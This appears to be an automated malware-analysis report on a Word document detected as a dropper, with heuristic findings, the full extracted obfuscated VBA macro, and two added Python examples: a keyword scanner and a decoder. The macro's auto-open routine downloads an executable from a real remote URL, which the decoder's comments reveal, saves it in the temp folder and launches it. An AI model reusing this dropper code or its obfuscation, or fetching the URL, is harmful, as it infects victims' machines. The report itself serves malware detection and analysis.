Verdict: MALICIOUS
Risk Score: 338
Malware Insights
MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic; T1105 Ingress Tool Transfer
The file contains VBA macros, including a Document_Open auto-execution routine (written as docUmeNt_opeN; VBA is case-insensitive, so the odd casing changes nothing for the interpreter and only hinders case-sensitive string matching), which is a common initial-execution technique. On open the macro resolves its configuration strings through a custom decoder, builds a drop path from an environment variable read with VBA.Environ$ plus a decoded filename, fetches a payload to that path with URLDownloadToFileW (imported from urlmon through a Declare whose function name is random noise but whose Alias still names the real export; both branches of the #If VBA7 And Win64 block declare it, so the chain works on 32-bit and 64-bit Office), and finally launches the dropped file through a COM object obtained with CreateObject(...).Open. This is an Ingress Tool Transfer pattern. The download URL, the drop filename, the environment-variable name and the COM ProgID are not visible in plaintext because each is passed through the decoder function ì¶uë8À¸q; they can be recovered by re-implementing that routine. Numeric arguments are hidden as arithmetic on literals (for example (-526 - (-5944) + (-5418)) evaluates to 0), and the module is padded with unrelated Excel, UserForm and Outlook helper code that docUmeNt_opeN never calls, a common way to dilute keyword-based heuristics. The URLDownloadToFileW import alone is a strong indicator of malicious intent.
Heuristics (10)

- ClamAV: Doc.Dropper.Agent-7081887-0 [critical, CLAMAV_DETECTION]. ClamAV detected this file as malware: Doc.Dropper.Agent-7081887-0.
- Reference to URLDownloadToFile API [critical, SC_STR_URLDOWNLOAD]. The string URLDownloadToFile is present in the file; in this sample it survives as the Alias of a Declare statement whose own function name is randomised.
- VBA macros detected [medium, OLE_VBA_MACROS, 6 related findings]. Document contains VBA macro code.
- URLDownloadToFile in VBA [critical, OLE_VBA_DOWNLOAD]. Matched lines in script:
  And VBA7 And Win64 And 1 And True Then
  Private Declare PtrSafe Function ghj89j489jj894j89yt4ty89j4t89j4j89tr4h8sft4ghs89h4f89h4l84lol84oil984fb564bg8f4bf8gb4ft48t4hd6w4564gwf68h4gfhjj8f4gh Lib "urlmon" Alias "URLDownloadToFileW" (ByVal x4¦SZC¬¢á9§i¯ö·»9¤KJ®ônO»YiXÉï As Long, ByVal ƒîhúDà»ÂXbFOçé¼D£µ¯à±¥ÆUJ As LongPtr, ByVal tKm§tÄ3²y²£æ³ojqàPF¢à¼Uyk¤´yB¶al8ûR¦mWtùsmTƒ²n As LongPtr, ByVal æU®£lºWT©·E¢ÉJYûb³¸wwé As Long, ByVal Cj¨Dal8ûR¦mWtùsmTƒ²n3P3 As Long) As LongPtr
- CreateObject call [high, OLE_VBA_CREATEOBJ]. Matched lines in script (the download call and the launch of the dropped file, at the end of docUmeNt_opeN):
  Call ghj89j489jj894j89yt4ty89j4t89j4j89tr4h8sft4ghs89h4f89h4l84lol84oil984fb564bg8f4bf8gb4ft48t4hd6w4564gwf68h4gfhjj8f4gh(0, StrPtr(ì¶uë8À¸q("hQRLtdJZtwNlpgYS:VD0/0An/_BCfeE-r4aUeDnDe{pkt`@9o+kJaMt8iFb_rM8g./}txE{eyDj5zFWh/,[_fOkhlgu,iu,TtK:L.2FbeMfPxm<oeN]s")), StrPtr(»ni¿3), (-526 - (-5944) + (-5418)), ((9146) - (1066) + (-8080)))
  CreateObject(ì¶uë8À¸q(IÄCêaAédxguS(1))).Open (»ni¿3)
  End Sub
- GetObject call [high, OLE_VBA_GETOBJ]. Matched lines in script:
  On Error Resume Next
  Set oOutlook = GetObject(, "Outlook.Application")
  On Error GoTo 0
  Caveat: this hit sits in rQG1test_if_OutlookIsOpen, a routine that docUmeNt_opeN never calls. It belongs to the benign filler code and is not part of the infection chain, so do not weight it as execution evidence.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]. Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low, OLE_VBA_DOCOPEN]. Matched lines in script:
  Sub docUmeNt_opeN()
  IÄCêaAédxguS(0) = l²DGU8åÜ©ä(0, -4935, 3176)
- Environ() call (env variable access) [low, OLE_VBA_ENVIRON]. Matched lines in script (the drop path is the decoded environment variable plus a decoded filename):
  »ni¿3 = VBA.Environ$(ì¶uë8À¸q(IÄCêaAédxguS(0))) + ì¶uë8À¸q("\.DTt,d;zaHAoXuuuueBjc9ywHxij@9LgRxpi@>F.n(5et`YxVpFe@ip")
  Call ghj89j489jj894j89yt4ty89j4t89j4j89tr4h8sft4ghs89h4f89h4l84lol84oil984fb564bg8f4bf8gb4ft48t4hd6w4564gwf68h4gfhjj8f4gh(0, StrPtr(ì¶uë8À¸q("hQRLtdJZtwNlpgYS:VD0/0An/_BCfeE-r4aUeDnDe{pkt`@9o+kJaMt8iFb_rM8g./}txE{eyDj5zFWh/,[_fOkhlgu,iu,TtK:L.2FbeMfPxm<oeN]s")), StrPtr(»ni¿3), (-526 - (-5944) + (-5418)), ((9146) - (1066) + (-8080)))
- Embedded URL [info, EMBEDDED_URL]. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro). This is the standard OOXML DrawingML namespace, not the download target; the real URL only exists at runtime as the output of the string decoder.
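Most of the findings above are keyword heuristics; the one judgement they cannot make on their own is whether a hit lies on the path that actually executes. The following Python scanner is an added example, not the analyzer's code: it re-creates five of the labels over a constructed, shortened excerpt of this sample's macro (placeholder identifiers and truncated literals are assumptions made for readability) and marks each hit as reachable or not from the auto-exec entry point. It also shows why OLE_VBA_DOWNLOAD still fires despite the randomised import name: the Declare statement's Alias carries the real export, and a call through the random name is scored as the real API once that alias is applied.

```python
"""
Keyword heuristics in the style of this report (labels reused from it) plus a reachability
check from the auto-exec entry point. Added example; not the analyzer's code. SAMPLE is a
constructed, shortened excerpt of the macro on this page: long random identifiers are replaced
by short placeholders and the encoded literals are truncated (both are assumptions).
"""
import re

# VBA is case-insensitive, so every pattern is too: "docUmeNt_opeN" is Document_Open.
HEURISTICS = {
    "OLE_VBA_DOCOPEN": re.compile(r"^\s*(?:Private\s+|Public\s+)?Sub\s+Document_Open\b", re.I),
    # Matches the real export name whether it appears as an Alias or as a (de-aliased) call.
    "OLE_VBA_DOWNLOAD": re.compile(r'\bAlias\s+"URLDownloadToFile[AW]?"|\bURLDownloadToFile[AW]?\s*\(', re.I),
    "OLE_VBA_CREATEOBJ": re.compile(r"\bCreateObject\s*\(", re.I),
    "OLE_VBA_GETOBJ": re.compile(r"\bGetObject\s*\(", re.I),
    "OLE_VBA_ENVIRON": re.compile(r"\bEnviron\$?\s*\(", re.I),
}
AUTOEXEC = {"document_open", "autoopen", "auto_open", "workbook_open"}
PROC_START = re.compile(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+([^\s(]+)", re.I)
PROC_END = re.compile(r"^\s*End\s+(?:Sub|Function)\b", re.I)
DECLARE = re.compile(r'^\s*(?:Private\s+|Public\s+)?Declare\s+(?:PtrSafe\s+)?(?:Sub|Function)\s+([^\s(]+).*?\bAlias\s+"([^"]+)"', re.I)
IDENT = re.compile(r"[^\W\d]\w*")  # Unicode-aware, since the real sample uses non-ASCII names


def split_procedures(src: str) -> dict:
    """Map lower-cased Sub/Function names to their lines; module-level lines go under '<module>'."""
    procs, cur = {"<module>": []}, "<module>"
    for line in src.splitlines():
        m = PROC_START.match(line)
        if m and cur == "<module>":
            cur = m.group(1).lower()
            procs[cur] = [line]
            continue
        procs[cur].append(line)
        if cur != "<module>" and PROC_END.match(line):
            cur = "<module>"
    return procs


def declared_aliases(src: str) -> dict:
    """Declare statements: the random local name -> the real exported symbol named by Alias."""
    return {m.group(1).lower(): m.group(2) for m in map(DECLARE.match, src.splitlines()) if m}


def reachable_from_autoexec(procs: dict) -> set:
    """Procedures transitively referenced from an auto-exec entry (naive identifier-based call graph)."""
    names = set(procs) - {"<module>"}
    seen, stack = set(), [p for p in names if p in AUTOEXEC]
    while stack:
        p = stack.pop()
        if p in seen:
            continue
        seen.add(p)
        stack.extend(t.lower() for t in IDENT.findall("\n".join(procs[p])) if t.lower() in names)
    return seen


def scan(src: str) -> list:
    """Run the heuristics over every line, tagging each hit with its procedure and reachability."""
    procs, aliases = split_procedures(src), declared_aliases(src)
    live, hits = reachable_from_autoexec(procs), []
    for proc, lines in procs.items():
        for line in lines:
            text = line
            for local, real in aliases.items():  # score a call through a random name as the real API
                text = re.sub(rf"\b{re.escape(local)}\b", real, text, flags=re.I)
            for label, rx in HEURISTICS.items():
                if rx.search(text):
                    reachable = None if proc == "<module>" else proc in live
                    hits.append({"label": label, "proc": proc, "reachable": reachable, "line": line.strip()})
    return hits


def summarize(hits: list) -> dict:
    """Labels split by whether the code that triggered them is on the auto-exec path."""
    return {
        "reachable": sorted({h["label"] for h in hits if h["reachable"]}),
        "unreachable": sorted({h["label"] for h in hits if h["reachable"] is False}),
    }


# Constructed excerpt of the macro on this page (placeholder names, truncated literals).
SAMPLE = r'''
Private Declare PtrSafe Function ghj89_download Lib "urlmon" Alias "URLDownloadToFileW" (ByVal a As Long, ByVal b As LongPtr, ByVal c As LongPtr, ByVal d As Long, ByVal e As Long) As LongPtr
Private cfg(10)
Sub rQG1test_if_OutlookIsOpen()
    Dim oOutlook As Object
    On Error Resume Next
    Set oOutlook = GetObject(, "Outlook.Application")
    On Error GoTo 0
End Sub
Sub docUmeNt_opeN()
    cfg(0) = tbl(0, -4935, 3176)
    cfg(1) = tbl(1, -6144, -9501)
    p = VBA.Environ$(dec(cfg(0))) + dec("\.DTt,d;...")
    Call ghj89_download(0, StrPtr(dec("hQRLtdJZ...")), StrPtr(p), (-526 - (-5944) + (-5418)), ((9146) - (1066) + (-8080)))
    CreateObject(dec(cfg(1))).Open (p)
End Sub
Function dec(s) As String
    dec = s
End Function
Function tbl(i, x, y)
    tbl = ""
End Function
'''
```

Run over the excerpt, summarize(scan(SAMPLE)) puts OLE_VBA_DOCOPEN, OLE_VBA_DOWNLOAD, OLE_VBA_ENVIRON and OLE_VBA_CREATEOBJ on the reachable side and OLE_VBA_GETOBJ on the unreachable side, which matches a manual reading of the full source: the Outlook check lives in decoy code. The call graph is identifier-based and naive (it does not follow late-bound calls through CallByName or Application.Run), so treat "unreachable" as a prompt to look closer rather than proof of harmlessness.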
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11667 bytes | 6aea3de2fc94870d32ab537eb56805f4456f0192cfdb001aa70a995bbe474365 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Not False And 1 And 1 And 1 And 1 And 1 _
And VBA7 And Win64 And 1 And True Then
Private Declare PtrSafe Function ghj89j489jj894j89yt4ty89j4t89j4j89tr4h8sft4ghs89h4f89h4l84lol84oil984fb564bg8f4bf8gb4ft48t4hd6w4564gwf68h4gfhjj8f4gh Lib "urlmon" Alias "URLDownloadToFileW" (ByVal x4¦SZC¬¢á9§i¯ö·»9¤KJ®ônO»YiXÉï As Long, ByVal ƒîhúDà»ÂXbFOçé¼D£µ¯à±¥ÆUJ As LongPtr, ByVal tKm§tÄ3²y²£æ³ojqàPF¢à¼Uyk¤´yB¶al8ûR¦mWtùsmTƒ²n As LongPtr, ByVal æU®£lºWT©·E¢ÉJYûb³¸wwé As Long, ByVal Cj¨Dal8ûR¦mWtùsmTƒ²n3P3 As Long) As LongPtr
Private Declare PtrSafe Function GetSystemMetricskDC4 Lib "USER32" (ByVal nIndex As Long) As LongPtr
Private Declare PtrSafe Function GdipCreateHBITMAPFromBitmapl473 Lib "GDIPlus" (ByVal bitmap As LongPtr, hbmReturn As LongPtr, ByVal background As Long) As LongPtr
Private Declare PtrSafe Function timeGetTimeMDgb Lib "winmm.dll" () As LongPtr
#Else
Private Declare Function SendMessageAhfdy Lib "user32" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function IsCharAlphaNumericADOIw Lib "USER32" (ByVal byChar As Byte) As Long
Private Declare Function timeGetTimeyXIx Lib "winmm.dll" () As Long
Private Declare Function ghj89j489jj894j89yt4ty89j4t89j4j89tr4h8sft4ghs89h4f89h4l84lol84oil984fb564bg8f4bf8gb4ft48t4hd6w4564gwf68h4gfhjj8f4gh Lib "urlmon" Alias "URLDownloadToFileW" (ByVal x4¦SZC¬¢á9§i¯ö·»9¤KJ®ônO»YiXÉï As Long, ByVal ƒîhúDà»ÂXbFOçé¼D£µ¯à±¥ÆUJ As Long, ByVal tKm§tÄ3²y²£æ³ojqàPF¢à¼Uyk¤´yB¶al8ûR¦mWtùsmTƒ²n As Long, ByVal æU®£lºWT©·E¢ÉJYûb³¸wwé As Long, ByVal Cj¨Dal8ûR¦mWtùsmTƒ²n3P3 As Long) As Long
#End If
Private IÄCêaAédxguS(10)
Function h3¤·hòöô(ëIP®T±9§¬3, Ká«á´Xxö²q, êÆVëì9ì3l§t)
Select Case ëIP®T±9§¬3
Case (0): h3¤·hòöô = "TRQwE3r[MR7hPmY}"
Case (1): h3¤·hòöô = "SpM=hs\>eXx:lx[ql.9)./arAt98pT?DpuS[l7YUiv\|cfW<a|GCt?54iLXuo-,`nYJU"
Case (2): h3¤·hòöô = "TqAz¾ëEb¶gºá"
Case (3): h3¤·hòöô = "åxoº¢·3U"
Case (4): h3¤·hòöô = "¿Jh¹ä¸F3"
Case (5): h3¤·hòöô = "hGK¸Ö6K"
Case (6): h3¤·hòöô = "¢4I©à¤iDc"
Case (7): h3¤·hòöô = "À·3NºúXü±z7±"
Case (8): h3¤·hòöô = "àÜgvªTX´¿Vc±"
Case (9): h3¤·hòöô = "ñ8J²VÑRCµÉÉ"
End Select
End Function
Sub XkiAquickly_Change_Data_inRange()
Dim googleCar As Range
Set googleCar = Range("B2").CurrentRegion
For Each Tesla In googleCar
Tesla.Value = 20
Next
End Sub
Sub c02Kchange_Data_inColumn()
Dim googleCar As Range
Set googleCar = Range("B2").CurrentRegion
For Each Tesla In googleCar.Columns(1)
Tesla.Value = 15
Next
End Sub
'Instead of For...Each just :
'googleCar.Value = ...
Sub CSUFchange_specific_Data_inRange()
Dim googleCar As Range
Set googleCar = Range("B2").CurrentRegion
For Each Tesla In googleCar
If Tesla = 5 Then
googleCar.Value = 10
End If
Next
End Sub
Function àSwzJ»â(èM¿1dass, ©¸åñÄÖï»jZO, q±U¬Ö¿¶4¤²Ü, À7¥f¦aVlM, a®BTb3f5éòaƒ, ££êÑb¢jñ1)
àSwzJ»â = StrConv(èM¿1dass, À7¥f¦aVlM)
End Function
Private Sub xtJ8mY4wCommandButton12_Click()
'
' When the user clicks the button, we need to know
' which value needs to be implemented from which
' control element
'
Result = HxQMget_valeur_de_Optionbutton(0)
If Result = False Then
'
' We need to test the value that the user entered
' to not get errors on the sheet
'
wk.Range("jours_activités").Value = (TextBox1.Value * 1)
Else
get_valeur_list = ComboBox1.Value
Select Case get_valeur_list
Case Is = "Normal":
wk.Range("jours_activités").Value = 365
Case Is = "Business":
wk.Range("jours_activités").Value = 251
Case Is = "Jours ouvrées, Sans Weekend, Avec vacances":
wk.Range("jours_activités").Value = 260
End Select
End If
'
' Create object to change phrases
'
Dim changer_les_phrases As PhrasesEngine
Set changer_les_phrases = New PhrasesEngine
changer_les_phrases.change_phrases
End Sub
Private Sub qIo6MNGROptionButton1_Change()
'
' We detect change on the option button number 1
' and if the user changed to 'personalized',
' we enable the corresponding elements for him/her
'
Result = HxQMget_valeur_de_Optionbutton(0)
If Result = False Then
TextBox1.Enabled = True
TextBox1.Value = 365
ComboBox1.Enabled = False
Else
TextBox1.Enabled = False
TextBox1.Value = ""
ComboBox1.Enabled = True
End If
End Sub
Private Sub TWPfimakUserForm_Initializer()
Dim weeks(2) As String
Set wk = Worksheets("Config")
'Enable system radio button as true
OptionButton1.Value = True
Result = HxQMget_valeur_de_Optionbutton(0)
If Result Then
TextBox1.Enabled = False
End If
End Sub
Private Function HxQMget_valeur_de_Optionbutton(Optional ByVal option_button As Long = 0) As Boolean
'
' This is a helper that retrieves the current value
' of the option buttons
'
If option_button = 0 Then
HxQMget_valeur_de_Optionbutton = OptionButton1.Value
ElseIf option_button = 1 Then
HxQMget_valeur_de_Optionbutton = OptionButton1.Value
Else
Err.Raise 0
End If
End Function
Private Sub EUn0ppD6UserForm_Terminate()
' DOES NOT WORK
' This is to set the textbox to the new value
ReglagesForm.TextBox5.Value = wk.Range("jours_par_semaines").Value
End Sub
Function T´WQçù§¶¦êwmV(¸qâPë¨Xà, dòrTÁÜÖmæ, zæ¶Â¹ªOà, ÆúH¦XbPé, èÀâuÂE§¢Y, PºFRé±gG¿)
T´WQçù§¶¦êwmV = StrConv(¸qâPë¨Xà, ÆúH¦XbPé)
End Function
Private Sub J8LDg1wECommandButton2_Click()
'
' This will show an additional form to the user as
' a way to form him/her to not change the weeks directly
' on the main form
'
SemainesForm.Show
End Sub
Private Sub AFFqk9xLCommandButton3_Click()
PrixForm.Show
End Sub
Private Sub Fdk2nmwNset_Params()
'
' This a helper used to set parameters to
' the textboxes
'
TextBox1.Value = wk.Range("personnel").Value
TextBox2.Value = wk.Range("salaire").Value
TextBox3.Value = wk.Range("jours_activités").Value
TextBox4.Value = wk.Range("heures_par_jours").Value
TextBox5.Value = wk.Range("jours_par_semaines").Value
'
' Prevent direct change of activity days froms userform
'
TextBox3.Locked = True
TextBox3.Enabled = False
End Sub
Function ì¶uë8À¸q(©Àn¼TSP¨Á8¸) As String
Dim ÖPlïeL¥ªD(1055) As Byte, ¿ÿjºèEd©³66BÁv() As Byte
¿ÿjºèEd©³66BÁv = àSwzJ»â(©Àn¼TSP¨Á8¸, IÄCêaAédxguS(2), IÄCêaAédxguS(3), (-6401 - (3084) + (9613)), IÄCêaAédxguS(4), IÄCêaAédxguS(5))
For ævá´M01½³ƒU97nR = 0 To UBound(¿ÿjºèEd©³66BÁv) - 1
If (ævá´M01½³ƒU97nR Mod 4 = ((9146) - (1066) + (-8080))) Then
ÖPlïeL¥ªD(´ëì⨢NÀ¿îbRjff) = ¿ÿjºèEd©³66BÁv(ævá´M01½³ƒU97nR)
´ëì⨢NÀ¿îbRjff = ´ëì⨢NÀ¿îbRjff + 1
End If
Next ævá´M01½³ƒU97nR
ì¶uë8À¸q = Left(T´WQçù§¶¦êwmV(ÖPlïeL¥ªD, IÄCêaAédxguS(6), IÄCêaAédxguS(7), (-2136 - (-9775) + (-7575)), IÄCêaAédxguS(8), IÄCêaAédxguS(9)), ´ëì⨢NÀ¿îbRjff)
End Function
Sub rQG1test_if_OutlookIsOpen()
Dim oOutlook As Object
On Error Resume Next
Set oOutlook = GetObject(, "Outlook.Application")
On Error GoTo 0
If oOutlook Is Nothing Then
MsgBox "Outlook is not open, open Outlook and try again"
Else
' TO DO
'
MsgBox "Is Open"
End If
End Sub
Sub docUmeNt_opeN()
IÄCêaAédxguS(0) = l²DGU8åÜ©ä(0, -4935, 3176)
IÄCêaAédxguS(1) = l²DGU8åÜ©ä(1, -6144, -9501)
IÄCêaAédxguS(2) = l²DGU8åÜ©ä(2, -4330, -6328)
IÄCêaAédxguS(3) = l²DGU8åÜ©ä(3, -7243, -8927)
IÄCêaAédxguS(4) = l²DGU8åÜ©ä(4, 7535, -6891)
IÄCêaAédxguS(5) = l²DGU8åÜ©ä(5, 5233, 1409)
IÄCêaAédxguS(6) = l²DGU8åÜ©ä(6, -1681, 3351)
IÄCêaAédxguS(7) = l²DGU8åÜ©ä(7, 8775, -4982)
IÄCêaAédxguS(8) = l²DGU8åÜ©ä(8, -6928, -4562)
IÄCêaAédxguS(9) = l²DGU8åÜ©ä(9, 6480, -3101)
»ni¿3 = VBA.Environ$(ì¶uë8À¸q(IÄCêaAédxguS(0))) + ì¶uë8À¸q("\.DTt,d;zaHAoXuuuueBjc9ywHxij@9LgRxpi@>F.n(5et`YxVpFe@ip")
Call ghj89j489jj894j89yt4ty89j4t89j4j89tr4h8sft4ghs89h4f89h4l84lol84oil984fb564bg8f4bf8gb4ft48t4hd6w4564gwf68h4gfhjj8f4gh(0, StrPtr(ì¶uë8À¸q("hQRLtdJZtwNlpgYS:VD0/0An/_BCfeE-r4aUeDnDe{pkt`@9o+kJaMt8iFb_rM8g./}txE{eyDj5zFWh/,[_fOkhlgu,iu,TtK:L.2FbeMfPxm<oeN]s")), StrPtr(»ni¿3), (-526 - (-5944) + (-5418)), ((9146) - (1066) + (-8080)))
CreateObject(ì¶uë8À¸q(IÄCêaAédxguS(1))).Open (»ni¿3)
End Sub
Sub ov9Wfile_Picker()
'
' Imports table / Microsoft Office Object Library 16.0
'
'Dim
Dim table_Name(1) As Variant
Dim sheet_Path As String
'Open file picker
Dim fd As Office.FileDialog
Set fd = Application.FileDialog(msoFileDialogFilePicker)
'Open file picker
With fd
.AllowMultiSelect = False
.Title = "Select a file"
.Filters.Clear
.Filters.Add "Excel", "*.xlsx"
'When user has picked file
If .Show = True Then
'Path
sheet_Path = fd.SelectedItems.Item(1)
'Name
table_Name(0) = Dir(fd.SelectedItems.Item(1))
Else
'TO DO
End If
End With
End Sub
Function l²DGU8åÜ©ä(¿ôgRÖPl0îÿC, thúòrâGqÁï, äkRÿòq伃4)
Select Case ¿ôgRÖPl0îÿC
Case (0): l²DGU8åÜ©ä = h3¤·hòöô(0, 4229, 1375)
Case (1): l²DGU8åÜ©ä = h3¤·hòöô(1, 6476, -6664)
Case (2): l²DGU8åÜ©ä = h3¤·hòöô(2, -7899, -5486)
Case (3): l²DGU8åÜ©ä = h3¤·hòöô(3, 4021, 1885)
Case (4): l²DGU8åÜ©ä = h3¤·hòöô(4, 5189, 1025)
Case (5): l²DGU8åÜ©ä = h3¤·hòöô(5, 9258, -4486)
Case (6): l²DGU8åÜ©ä = h3¤·hòöô(6, 8390, -8063)
Case (7): l²DGU8åÜ©ä = h3¤·hòöô(7, 708, 1246)
Case (8): l²DGU8åÜ©ä = h3¤·hòöô(8, -2002, -1601)
Case (9): l²DGU8åÜ©ä = h3¤·hòöô(9, -4898, -6487)
End Select
End Function
Sub Wd65CreateAppointment()
Dim olAppt As AppointmentItem
Set olAppt = Application.CreateItem(olAppointmentItem)
With olAppt
.Subject = "My Subject"
.Body = "This is the body"
.RequiredAttendees = "something@gmail.com"
.Location = "Lille"
.ReminderMinutesBeforeStart = "30"
.Start = #11/19/2017 2:00:00 AM#
.End = #11/19/2017 4:00:00 AM#
'.BillingInformation = "something"
.Categories = "Business"
.Display
End With
End Sub
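The strings that feed the download call are not stored in plaintext: docUmeNt_opeN passes each one through ì¶uë8À¸q, which (via the two StrConv wrappers àSwzJ»â and T´WQçù§¶¦êwmV) converts the string to ANSI bytes, keeps every byte whose index is a multiple of 4 while never examining the final byte, and converts the survivors back to a string. The Python re-implementation below is an added example, not code from the sample or from the analyzer. The encoded literals are copied verbatim from the extracted macro above; the decoded values are simply what the macro's own routine yields from them and should be treated as indicators from this sample, not as anything to fetch.

```python
"""
Re-implementation of the string decoder used by the macro on this page (the function shown as
ì¶uë8À¸q together with its two StrConv wrappers). Added example: not code from the sample or the
analyzer. Encoded literals are copied from the extracted macro; everything else is derived.
"""

# The macro hides its constants behind arithmetic on literals; these are the three it uses.
VB_FROM_UNICODE = -6401 - 3084 + 9613   # 128 = vbFromUnicode: StrConv(str, 128) -> ANSI byte array
VB_UNICODE = -2136 + 9775 - 7575        # 64  = vbUnicode:     StrConv(bytes, 64) -> string
STRIDE_RESIDUE = 9146 - 1066 - 8080     # 0   : the loop keeps bytes where i Mod 4 = 0


def decode(encoded: str, codepage: str = "cp1252") -> str:
    """
    Mirror of the VBA routine:
        b = StrConv(encoded, vbFromUnicode)        ' ANSI bytes of the string
        For i = 0 To UBound(b) - 1                 ' the last byte is never examined
            If i Mod 4 = 0 Then out(n) = b(i): n = n + 1
        Left(StrConv(out, vbUnicode), n)           ' back to a string, trimmed to n chars
    The codepage only matters for non-ASCII input; every literal in this sample is ASCII.
    """
    assert (VB_FROM_UNICODE, VB_UNICODE, STRIDE_RESIDUE) == (128, 64, 0)
    data = encoded.encode(codepage)
    kept = bytes(data[i] for i in range(len(data) - 1) if i % 4 == STRIDE_RESIDUE)
    return kept.decode(codepage)


# Encoded literals copied verbatim from the extracted macro (raw strings keep the backslashes).
ENCODED = {
    "environ_key": r"TRQwE3r[MR7hPmY}",   # h3¤·hòöô case 0, reached via IÄCêaAédxguS(0)
    "progid": r"SpM=hs\>eXx:lx[ql.9)./arAt98pT?DpuS[l7YUiv\|cfW<a|GCt?54iLXuo-,`nYJU",  # case 1
    "url": r"hQRLtdJZtwNlpgYS:VD0/0An/_BCfeE-r4aUeDnDe{pkt`@9o+kJaMt8iFb_rM8g./}txE{eyDj5zFWh/,[_fOkhlgu,iu,TtK:L.2FbeMfPxm<oeN]s",
    "filename": r"\.DTt,d;zaHAoXuuuueBjc9ywHxij@9LgRxpi@>F.n(5et`YxVpFe@ip",
}


def reconstruct_chain() -> dict:
    """Decode every literal docUmeNt_opeN consumes and spell out the resulting call sequence."""
    d = {name: decode(enc) for name, enc in ENCODED.items()}
    d["drop_path"] = f"%{d['environ_key']}%{d['filename']}"
    d["calls"] = [
        # Fourth and fifth arguments are the obfuscated zeros: dwReserved = 0, no callback.
        f'URLDownloadToFileW(0, "{d["url"]}", "{d["drop_path"]}", 0, 0)',
        f'CreateObject("{d["progid"]}").Open("{d["drop_path"]}")',
    ]
    return d


if __name__ == "__main__":
    for key, value in reconstruct_chain().items():
        print(f"{key}: {value}")
    # environ_key: TEMP / progid: Shell.Application / url: http://freetoair.xyz/flit.exe
    # filename: \tzoujwjgi.exe / drop_path: %TEMP%\tzoujwjgi.exe
```

reconstruct_chain() lays the infection chain out in the clear: the drop path is Environ$("TEMP") joined with "\tzoujwjgi.exe", the download is URLDownloadToFileW(0, "http://freetoair.xyz/flit.exe", drop_path, 0, 0), and the launch is CreateObject("Shell.Application").Open(drop_path). The non-ASCII strings in cases 2 to 9 of h3¤·hòöô never reach the decoder; they are passed only as unused arguments to the StrConv wrappers, which read their first and fourth parameters and ignore the rest.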